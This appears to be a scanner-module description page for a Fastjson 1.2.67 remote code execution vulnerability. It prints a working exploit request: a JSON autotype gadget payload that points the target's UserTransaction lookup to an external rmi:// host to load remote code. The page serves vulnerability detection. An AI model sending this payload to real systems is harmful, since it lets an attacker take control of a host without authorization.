Automate Recon and scanning process with Vidoc. All security teams in one place
By kannthu
The "Fastjson 1.2.67 - Remote Code Execution" module is designed to detect a vulnerability in Fastjson 1.2.67, a popular JSON library for Java. This vulnerability allows remote attackers to execute arbitrary code on the target system. The severity of this vulnerability is classified as critical, with a CVSS score of 10.
Author: zh
If successfully exploited, this vulnerability can lead to unauthorized remote code execution on the target system. Attackers can potentially gain full control over the affected system, compromising its confidentiality, integrity, and availability.
The module sends a crafted HTTP POST request to the target system, exploiting the Fastjson vulnerability. The request payload includes a specially crafted JSON object that triggers the remote code execution vulnerability.
Example request:
POST / HTTP/1.1
Host: <Hostname>
Content-Type: application/json
{
"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
"properties":{
"@type":"java.util.Properties",
"UserTransaction":"rmi://<InteractionURL>/Exploit"
}
}
The module includes matching conditions to determine if the vulnerability is present:
- The request must not use the "dns" protocol for interaction. - The response status code must not be 200.If both conditions are met, the module reports the vulnerability.
Reference: https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson